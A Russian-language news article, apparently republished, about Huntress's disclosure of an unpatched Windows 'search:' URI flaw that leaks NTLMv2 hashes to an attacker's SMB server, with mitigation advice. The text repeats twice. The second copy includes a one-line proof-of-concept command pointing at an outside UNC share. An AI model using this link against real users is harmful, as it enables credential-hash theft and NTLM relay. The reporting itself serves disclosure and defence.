Один клик — и пароль у хакера. Новая уязвимость Windows передаёт данные пользователя злоумышленнику без вирусов
NewsMakerНовая атака работает даже при включённом Защитнике
Один клик по ссылке в Windows может оказаться достаточным, чтобы компьютер сам передал злоумышленнику данные для атаки. Проблема связана не с вредоносной программой и не со сложной цепочкой взлома, а с обычным обработчиком ссылок, который встроен в систему.
Специалисты Huntress раскрыли детали неисправленной проблемы, через которую атакующий может получить NTLMv2-хеш пользователя. Новый вариант похож на CVE-2026-33829 , уязвимость в приложении Windows «Ножницы», которую Microsoft исправила в апреле 2026 года.
CVE-2026-33829 CVSS:3.1/AV:N/AC:L/Au:N/C
/I:N/A:N — 5.0 (Medium) затрагивала обработчик ms-screensketch: и позволяла раскрыть чувствительные данные постороннему человеку. Как описывает Microsoft, атакующий мог убедить пользователя перейти по специально подготовленной ссылке в браузере, на веб-странице или в письме. После того как пользователь соглашался запустить такую ссылку, компьютер подключался к SMB-серверу злоумышленника и раскрывал NTLMv2-хеш, который затем можно было использовать для входа от имени жертвы.
Причина прежней уязвимости заключалась в том, что обработчик ссылок в «Ножницах» принимал параметр filePath, но не проверял переданный путь. Если в параметр попадал сетевой путь UNC, Windows обращалась к указанному ресурсу и запускала NTLM-аутентификацию. В результате атакующий мог получить Net-NTLMv2-хеш пользователя.
Новая проблема приводит к тому же результату, но использует другой обработчик. Вместо ms-screensketch: и параметра filePath применяется схема search: и параметр crumb=location:. Пример такой команды выглядит так:
Проблему удалось воспроизвести на Windows 11 25H2 Pro. В тесте использовалась обычная учётная запись без прав администратора, с включённой защитой Microsoft Defender по умолчанию. На стороне атакующего работал сервер с инструментом Responder, который сразу получил данные пользователя после запуска ссылки search: с параметром crumb=location: и сетевым путём SMB.
Особенность атаки в том, что пользователь видит только стандартное сообщение Windows о невозможности получить доступ к устройству, пути или файлу. К тому моменту хеш уже покидает компьютер. Huntress отмечает, что утечка происходит при первом запуске за сеанс входа в систему, а повторные попытки до выхода пользователя из учётной записи уже возвращают отказ в доступе.
Собранный хеш не является паролем в открытом виде, но всё равно представляет ценность для атаки. Злоумышленник может использовать полученные данные для ретрансляции NTLM и попытаться глубже закрепиться в сети, если внутренняя инфраструктура допускает такой сценарий.
Похожий приём с параметром crumb для кражи хеша уже описывалcя в феврале 2024 года в связи с CVE-2023-35636 . При этом нынешний вариант через search: снова показывает, что один и тот же класс ошибок может проявляться в разных обработчиках ссылок Windows.
Huntress сообщила о проблеме в Центр реагирования Microsoft 15 апреля 2026 года, на следующий день после выхода исправления для «Ножниц». Microsoft отказалась выпускать исправление и отдельный идентификатор CVE, сославшись на то, что планка обслуживания обычно применяется к случаям с высокой и критической степенью опасности. При этом CVE-2026-33829 тоже получила умеренную оценку, но всё же была исправлена.
Главная претензия Huntress заключается в непоследовательности подхода. Уязвимость в «Ножницах» получила CVE и обновление, хотя имела тот же класс, похожий рейтинг опасности и тот же практический результат. Вариант через search: остался без обновления, хотя связан уже не с отдельным приложением, а с проводником Windows и системным механизмом, который обрабатывает такие ссылки.
Дополнительная сложность связана с тем, что search: и search-ms: зарегистрированы в Windows как разные схемы, но указывают на один и тот же путь обработки через компонент ExplorerFrame.dll. Поэтому точечное исправление только одной схемы не решило бы проблему полностью. Надёжная защита должна закрывать сам механизм, который разрешает такие обращения к сетевым путям без достаточной проверки.
Для компаний такой случай показывает слабое место в подходе, где программа обновлений ориентируется только на наличие CVE. Организация могла установить апрельское исправление для «Ножниц» и при этом не увидеть близкий по смыслу вариант атаки через search:, потому что Microsoft не выпустила для него отдельный бюллетень.
Пока исправления нет, Huntress советует блокировать исходящие SMB-соединения там, где они не нужны. В первую очередь речь идёт о портах TCP 445 и TCP 139. Дополнительно стоит включить подпись SMB, чтобы перехваченные хеши нельзя было ретранслировать на внутренние службы, а также отключить NTLM там, где инфраструктура позволяет сделать это без сбоев. В почтовом трафике и журналах прокси-серверов стоит отслеживать ссылки search: и search-ms:, поскольку в обычной переписке такие адреса почти не нужны.
Один клик по ссылке в Windows может оказаться достаточным, чтобы компьютер сам передал злоумышленнику данные для атаки. Проблема связана не с вредоносной программой и не со сложной цепочкой взлома, а с обычным обработчиком ссылок, который встроен в систему.
Специалисты Huntress раскрыли детали неисправленной проблемы, через которую атакующий может получить NTLMv2-хеш пользователя. Новый вариант похож на CVE-2026-33829 , уязвимость в приложении Windows «Ножницы», которую Microsoft исправила в апреле 2026 года.
CVE-2026-33829 CVSS:3.1/AV:N/AC:L/Au:N/C
/I:N/A:N — 5.0 (Medium) затрагивала обработчик ms-screensketch: и позволяла раскрыть чувствительные данные постороннему человеку. Как описывает Microsoft, атакующий мог убедить пользователя перейти по специально подготовленной ссылке в браузере, на веб-странице или в письме. После того как пользователь соглашался запустить такую ссылку, компьютер подключался к SMB-серверу злоумышленника и раскрывал NTLMv2-хеш, который затем можно было использовать для входа от имени жертвы. Причина прежней уязвимости заключалась в том, что обработчик ссылок в «Ножницах» принимал параметр filePath, но не проверял переданный путь. Если в параметр попадал сетевой путь UNC, Windows обращалась к указанному ресурсу и запускала NTLM-аутентификацию. В результате атакующий мог получить Net-NTLMv2-хеш пользователя.
Новая проблема приводит к тому же результату, но использует другой обработчик. Вместо ms-screensketch: и параметра filePath применяется схема search: и параметр crumb=location:. Пример такой команды выглядит так:
start "" "search=test&crumb=location:\10.0.1.100\share". По словам специалиста Huntress Эндрю Шварца, механизм утечки NTLM, результат, условия атаки и умеренная оценка опасности совпадают с уже исправленной уязвимостью. Проблему удалось воспроизвести на Windows 11 25H2 Pro. В тесте использовалась обычная учётная запись без прав администратора, с включённой защитой Microsoft Defender по умолчанию. На стороне атакующего работал сервер с инструментом Responder, который сразу получил данные пользователя после запуска ссылки search: с параметром crumb=location: и сетевым путём SMB.
Особенность атаки в том, что пользователь видит только стандартное сообщение Windows о невозможности получить доступ к устройству, пути или файлу. К тому моменту хеш уже покидает компьютер. Huntress отмечает, что утечка происходит при первом запуске за сеанс входа в систему, а повторные попытки до выхода пользователя из учётной записи уже возвращают отказ в доступе.
Собранный хеш не является паролем в открытом виде, но всё равно представляет ценность для атаки. Злоумышленник может использовать полученные данные для ретрансляции NTLM и попытаться глубже закрепиться в сети, если внутренняя инфраструктура допускает такой сценарий.
Похожий приём с параметром crumb для кражи хеша уже описывалcя в феврале 2024 года в связи с CVE-2023-35636 . При этом нынешний вариант через search: снова показывает, что один и тот же класс ошибок может проявляться в разных обработчиках ссылок Windows.
Huntress сообщила о проблеме в Центр реагирования Microsoft 15 апреля 2026 года, на следующий день после выхода исправления для «Ножниц». Microsoft отказалась выпускать исправление и отдельный идентификатор CVE, сославшись на то, что планка обслуживания обычно применяется к случаям с высокой и критической степенью опасности. При этом CVE-2026-33829 тоже получила умеренную оценку, но всё же была исправлена.
Главная претензия Huntress заключается в непоследовательности подхода. Уязвимость в «Ножницах» получила CVE и обновление, хотя имела тот же класс, похожий рейтинг опасности и тот же практический результат. Вариант через search: остался без обновления, хотя связан уже не с отдельным приложением, а с проводником Windows и системным механизмом, который обрабатывает такие ссылки.
Дополнительная сложность связана с тем, что search: и search-ms: зарегистрированы в Windows как разные схемы, но указывают на один и тот же путь обработки через компонент ExplorerFrame.dll. Поэтому точечное исправление только одной схемы не решило бы проблему полностью. Надёжная защита должна закрывать сам механизм, который разрешает такие обращения к сетевым путям без достаточной проверки.
Для компаний такой случай показывает слабое место в подходе, где программа обновлений ориентируется только на наличие CVE. Организация могла установить апрельское исправление для «Ножниц» и при этом не увидеть близкий по смыслу вариант атаки через search:, потому что Microsoft не выпустила для него отдельный бюллетень.
Пока исправления нет, Huntress советует блокировать исходящие SMB-соединения там, где они не нужны. В первую очередь речь идёт о портах TCP 445 и TCP 139. Дополнительно стоит включить подпись SMB, чтобы перехваченные хеши нельзя было ретранслировать на внутренние службы, а также отключить NTLM там, где инфраструктура позволяет сделать это без сбоев. В почтовом трафике и журналах прокси-серверов стоит отслеживать ссылки search: и search-ms:, поскольку в обычной переписке такие адреса почти не нужны.